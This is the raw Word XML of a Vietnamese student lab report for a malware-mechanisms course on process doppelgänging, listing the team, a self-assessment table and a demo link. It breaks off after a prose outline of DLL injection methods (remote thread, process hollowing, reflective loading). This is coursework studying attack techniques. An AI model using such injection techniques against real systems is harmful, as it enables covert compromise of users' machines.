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1E5D6699" w:rsidR="00B16956" w:rsidRDefault="00B16956" w:rsidP="00B16956">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B16956">
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">BÁO CÁO </w:t>
      </w:r>
      <w:r w:rsidR="003E1B90">
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>BÀI TẬP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5A738F" w14:textId="64D039C9" w:rsidR="00295F41" w:rsidRPr="009613E4" w:rsidRDefault="00295F41" w:rsidP="00295F41">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295F41">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Môn học: </w:t>
      </w:r>
      <w:r w:rsidR="00EF174D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005A7EA5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cơ chế </w:t>
      </w:r>
      <w:r w:rsidR="003D571E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>hoạt động của mã độc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1256D11A" w14:textId="293E2048" w:rsidR="00FF12B3" w:rsidRPr="009613E4" w:rsidRDefault="00FF12B3" w:rsidP="00B16956">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Tên chủ đề: </w:t>
      </w:r>
      <w:r w:rsidR="00062395">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Song trùng tiến trình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733B935F" w14:textId="24C7FBAE" w:rsidR="008D0072" w:rsidRPr="005A7EA5" w:rsidRDefault="008D0072" w:rsidP="00B16956">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF174D">
        <w:rPr>
          <w:i/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">GVHD: </w:t>
      </w:r>
      <w:r w:rsidR="005A7EA5">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Phạm Văn Hậu – Phan Thế Duy</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00380AFD" w:rsidR="00DE0762" w:rsidRPr="009613E4" w:rsidRDefault="00DE0762" w:rsidP="008D0072">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="6480"/>
        </w:tabs>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A0023A">
        <w:t xml:space="preserve">Lớp: </w:t>
      </w:r>
      <w:r w:rsidR="005A7EA5">
        <w:t>NT230.N</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="005A7EA5">
        <w:t>21.ANTN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
        <w:gridCol w:w="3249"/>
        <w:gridCol w:w="2411"/>
        <w:gridCol w:w="3293"/>
      </w:tblGrid>
      <w:tr w:rsidR="008D0072" w:rsidRPr="008D0072" w14:paraId="00A192D9" w14:textId="77777777" w:rsidTr="005A7EA5">
        <w:trPr>
          <w:trHeight w:val="282"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="840" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="AEAAAA" w:themeFill="background2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="395D9C2D" w14:textId="06F0C633" w:rsidR="008D0072" w:rsidRPr="008D0072" w:rsidRDefault="008D0072" w:rsidP="005A7EA5">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="624"/>
              </w:tabs>
              <w:ind w:left="156"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>STT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3250" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="AEAAAA" w:themeFill="background2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="2450D6E3" w14:textId="69493AB2" w:rsidR="008D0072" w:rsidRPr="008D0072" w:rsidRDefault="008D0072" w:rsidP="005A7EA5">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:ind w:left="156"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008D0072">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Họ và tên</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="AEAAAA" w:themeFill="background2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="4C5090D7" w14:textId="33A7CE9B" w:rsidR="008D0072" w:rsidRPr="008D0072" w:rsidRDefault="008D0072" w:rsidP="005A7EA5">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:ind w:left="156"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008D0072">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>MSSV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3293" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="AEAAAA" w:themeFill="background2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="49D161CB" w14:textId="3A53ACC4" w:rsidR="008D0072" w:rsidRPr="008D0072" w:rsidRDefault="008D0072" w:rsidP="005A7EA5">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:ind w:left="1452"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008D0072">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Email</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D0072" w14:paraId="1CAB62E8" w14:textId="258E8FF6" w:rsidTr="005A7EA5">
        <w:trPr>
          <w:trHeight w:val="282"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="840" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62A1CBCD" w14:textId="5F500274" w:rsidR="008D0072" w:rsidRDefault="008D0072" w:rsidP="005A7EA5">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:ind w:left="156"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77B2AD33" w14:textId="53563869" w:rsidR="008D0072" w:rsidRDefault="005A7EA5" w:rsidP="005A7EA5">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:ind w:left="156"/>
            </w:pPr>
            <w:r>
              <w:t>Võ Anh Kiệt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F74B605" w14:textId="6E5BCD58" w:rsidR="008D0072" w:rsidRDefault="005A7EA5" w:rsidP="005A7EA5">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:ind w:left="156"/>
            </w:pPr>
            <w:r>
              <w:t>20520605</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3293" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69359CA4" w14:textId="5C45ECB7" w:rsidR="008D0072" w:rsidRDefault="005A7EA5" w:rsidP="005A7EA5">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>20520605</w:t>
            </w:r>
            <w:r w:rsidR="008D0072">
              <w:t>@gm.uit.edu.vn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D0072" w14:paraId="012575EA" w14:textId="2F607B77" w:rsidTr="005A7EA5">
        <w:trPr>
          <w:trHeight w:val="416"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="840" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B82F018" w14:textId="1B7AFE60" w:rsidR="008D0072" w:rsidRDefault="008D0072" w:rsidP="005A7EA5">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:ind w:left="156"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1392C893" w14:textId="363C4C8F" w:rsidR="008D0072" w:rsidRDefault="008D0072" w:rsidP="005A7EA5">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:ind w:left="156"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Nguyễn </w:t>
            </w:r>
            <w:r w:rsidR="005A7EA5">
              <w:t>Bùi Kim Ngân</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0731347F" w14:textId="7C84D3FC" w:rsidR="008D0072" w:rsidRDefault="005A7EA5" w:rsidP="005A7EA5">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:ind w:left="156"/>
            </w:pPr>
            <w:r>
              <w:t>20520648</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3293" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="236D4D96" w14:textId="1FD10C02" w:rsidR="008D0072" w:rsidRDefault="005A7EA5" w:rsidP="005A7EA5">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>20520648</w:t>
            </w:r>
            <w:r w:rsidR="008D0072">
              <w:t>@gm.uit.edu.vn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A7EA5" w14:paraId="75B4B944" w14:textId="5E431285" w:rsidTr="005A7EA5">
        <w:trPr>
          <w:trHeight w:val="456"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="840" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E015F5F" w14:textId="401267A8" w:rsidR="005A7EA5" w:rsidRDefault="005A7EA5" w:rsidP="005A7EA5">
            <w:pPr>
              <w:ind w:left="156"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="327AE826" w14:textId="51F33B91" w:rsidR="005A7EA5" w:rsidRDefault="005A7EA5" w:rsidP="005A7EA5">
            <w:pPr>
              <w:ind w:left="156"/>
            </w:pPr>
            <w:r>
              <w:t>Nguyễn Bình Thục Trâm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2412" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C4E6313" w14:textId="2812E4B3" w:rsidR="005A7EA5" w:rsidRDefault="005A7EA5" w:rsidP="005A7EA5">
            <w:pPr>
              <w:ind w:left="156"/>
            </w:pPr>
            <w:r>
              <w:t>20520815</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3291" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E2A6E67" w14:textId="528BAFB0" w:rsidR="005A7EA5" w:rsidRDefault="005A7EA5" w:rsidP="005A7EA5">
            <w:r>
              <w:t>20520815@gm.uit.edu.vn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="047E2C68" w14:textId="77777777" w:rsidR="005A7EA5" w:rsidRDefault="005A7EA5" w:rsidP="005A7EA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37889D95" w14:textId="270EF949"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E96342">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008D0072">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Kết quả</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> tự đánh giá</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F13188" w14:paraId="20994405" w14:textId="77777777" w:rsidTr="00BE480A">
        <w:trPr>
          <w:trHeight w:val="56"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="768" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="710E87A7" w14:textId="77777777" w:rsidR="00F13188" w:rsidRDefault="00F13188" w:rsidP="00E96342">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5674" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="557708A7" w14:textId="1AE18C21" w:rsidR="00F13188" w:rsidRDefault="005A7EA5" w:rsidP="00E96342">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Yêu cầu 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3330" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D0F576A" w14:textId="7E090E80" w:rsidR="00F13188" w:rsidRDefault="008F3256" w:rsidP="00D556D3">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="003D571E">
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidR="00F13188">
              <w:t>%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F13188" w14:paraId="1C400A5C" w14:textId="77777777" w:rsidTr="00BE480A">
        <w:trPr>
          <w:trHeight w:val="56"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="768" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="32D3245F" w14:textId="0AF909C0" w:rsidR="00F13188" w:rsidRDefault="004D33FE" w:rsidP="00E96342">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5674" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="69271EF6" w14:textId="0EFBBCD9" w:rsidR="00F13188" w:rsidRPr="00B00619" w:rsidRDefault="004D33FE" w:rsidP="00E96342">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Yêu cầu 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3330" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4389E5C2" w14:textId="496D9889" w:rsidR="00F13188" w:rsidRPr="004067CC" w:rsidRDefault="004D33FE" w:rsidP="004A55AE">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t>100%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F13188" w14:paraId="22E8B67F" w14:textId="77777777" w:rsidTr="00BE480A">
        <w:trPr>
          <w:trHeight w:val="56"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="768" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1499E032" w14:textId="05C61774" w:rsidR="00F13188" w:rsidRDefault="00F13188" w:rsidP="00E96342">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5674" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6E3A8CC4" w14:textId="2F87BF63" w:rsidR="00F13188" w:rsidRDefault="00F13188" w:rsidP="00E96342">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3330" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CD217D1" w14:textId="52D77A9D" w:rsidR="00F13188" w:rsidRDefault="00F13188"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31F46B81" w14:textId="19E41D47" w:rsidR="004D33FE" w:rsidRDefault="004D33FE" w:rsidP="004D33FE">
      <w:r>
        <w:t xml:space="preserve">Video demo: </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="009A3454">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://youtu.be/mPqGGSOGzcM</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3CD00CDB" w14:textId="77777777" w:rsidR="004D33FE" w:rsidRPr="004D33FE" w:rsidRDefault="004D33FE" w:rsidP="004D33FE"/>
    <w:p w14:paraId="3C73991D" w14:textId="7755CF08" w:rsidR="003D47DD" w:rsidRDefault="003D571E" w:rsidP="003D571E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Yêu cầu 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013E6CF5" w14:textId="74C73747" w:rsidR="004D33FE" w:rsidRPr="007D3A04" w:rsidRDefault="004D33FE" w:rsidP="003D47DD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D3A04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DLL injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3558EDE7" w14:textId="4E48B007" w:rsidR="007D3A04" w:rsidRDefault="007D3A04" w:rsidP="007D3A04">
      <w:r>
        <w:t>DLL injection là một kỹ thuật đ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r>
        <w:t>ợc sử dụng trong phát triển phần mềm và nghiên cứu bảo mật để tiêm các th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> viện động liên kết (DLL) vào không gian địa chỉ của một tiến trình đang chạy. DLL là các th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> viện chứa mã và dữ liệu có thể đ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r>
        <w:t>ợc sử dụng đồng thời bởi nhiều ch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ươ</w:t>
      </w:r>
      <w:r>
        <w:t>ng trình, và chúng là một phần không thể thiếu của hệ điều hành Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAB73E9" w14:textId="7D768511" w:rsidR="007D3A04" w:rsidRDefault="007D3A04" w:rsidP="007D3A04">
      <w:r>
        <w:t>Phương pháp thực hiện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E08C47" w14:textId="5DAE25A6" w:rsidR="007D3A04" w:rsidRDefault="007D3A04" w:rsidP="007D3A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Tìm kiếm tiến trình mục tiêu: Đầu tiên, bạn cần tìm ra tiến trình mà bạn muốn tiêm DLL vào. Điều này có thể đ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r>
        <w:t>ợc thực hiện bằng cách liệt kê danh sách các tiến trình đang chạy trên hệ thống hoặc sử dụng các công cụ hệ thống nh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Task Manager hoặc Process Explorer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4175A996" w14:textId="37F87D51" w:rsidR="007D3A04" w:rsidRDefault="007D3A04" w:rsidP="007D3A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Chọn một tiến trình và thu thập thông tin: Sau khi xác định đ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r>
        <w:t>ợc tiến trình mục tiêu, bạn cần thu thập thông tin về tiến trình đó, bao gồm ID tiến trình và các thông tin liên quan khác. Thông tin này sẽ đ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r>
        <w:t>ợc sử dụng để tiêm DLL vào tiến trình.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11458FC4" w14:textId="3C2A7050" w:rsidR="007D3A04" w:rsidRDefault="007D3A04" w:rsidP="007D3A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Tạo DLL: Bạn cần tạo một DLL có chứa mã và dữ liệu mà bạn muốn tiêm vào tiến trình. DLL này có thể đ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r>
        <w:t>ợc viết bằng một ngôn ngữ lập trình nh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> C/C++ và phải tuân theo các quy tắc cần thiết để có thể đ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r>
        <w:t>ợc tiêm vào tiến trình thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56793148" w14:textId="16DE8B31" w:rsidR="007D3A04" w:rsidRDefault="007D3A04" w:rsidP="007D3A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Tiêm DLL vào tiến trình: B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r>
        <w:t>ớc tiếp theo là tiêm DLL vào tiến trình mục tiêu. Có nhiều ph</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ươ</w:t>
      </w:r>
      <w:r>
        <w:t>ng pháp thực hiện DLL injection, bao gồm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B0F161" w14:textId="188B95A4" w:rsidR="007D3A04" w:rsidRDefault="007D3A04" w:rsidP="007D3A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="1170"/>
      </w:pPr>
      <w:r>
        <w:t>Remote Thread Injection: Kỹ thuật này sử dụng hàm nh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CreateRemoteThread để tạo một luồng mới trong tiến trình mục tiêu và chạy mã của DLL trong luồng này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51520C9E" w14:textId="3DF86E0C" w:rsidR="007D3A04" w:rsidRDefault="007D3A04" w:rsidP="007D3A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="1170"/>
      </w:pPr>
      <w:r>
        <w:t>Process Hollowing: Kỹ thuật này liên quan đến tạo ra một tiến trình con mới, sau đó ghi đè mã của tiến trình con bằng mã của DLL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42537C5A" w14:textId="7EA2A869" w:rsidR="007D3A04" w:rsidRDefault="007D3A04" w:rsidP="007D3A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="1170"/>
      </w:pPr>
      <w:r>
        <w:t>Reflective DLL Injection: Kỹ thuật này sử dụng một DLL đặc biệt đ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r>
        <w:t>ợc thiết kế để tự tải và thực thi mã của nó mà không cần sử dụng các hàm API chuẩn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2A3426" w14:textId="390CD051" w:rsidR="007D3A04" w:rsidRDefault="007D3A04" w:rsidP="007D3A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sử dụng DLL trong tiến trình: Khi DLL đã đ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r>
        <w:t>ợc tiêm thành công vào tiến trình, bạn có thể sử dụng các chức năng và dữ liệu trong DLL từ tiến trình đó. Điều này cho phép bạn mở rộng chức năng của tiến trình hoặc theo dõi và thay đổi hành vi của nó theo mong muốn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2548621E" w14:textId="77777777" w:rsidR="004D33FE" w:rsidRDefault="004D33FE" w:rsidP="003D47DD"/>
    <w:p w14:paraId="4A0DA0A9" w14:textId="77777777" w:rsidR="00BD3DC7" w:rsidRDefault="00BD3DC7" w:rsidP="003D47DD"/>
    <w:p w14:paraId="34723F9E" w14:textId="6F3DC63D" w:rsidR="00BD3DC7" w:rsidRPr="00BD3DC7" w:rsidRDefault="00BD3DC7" w:rsidP="003D47DD">
      <w:pPr>
        <w:rPr>
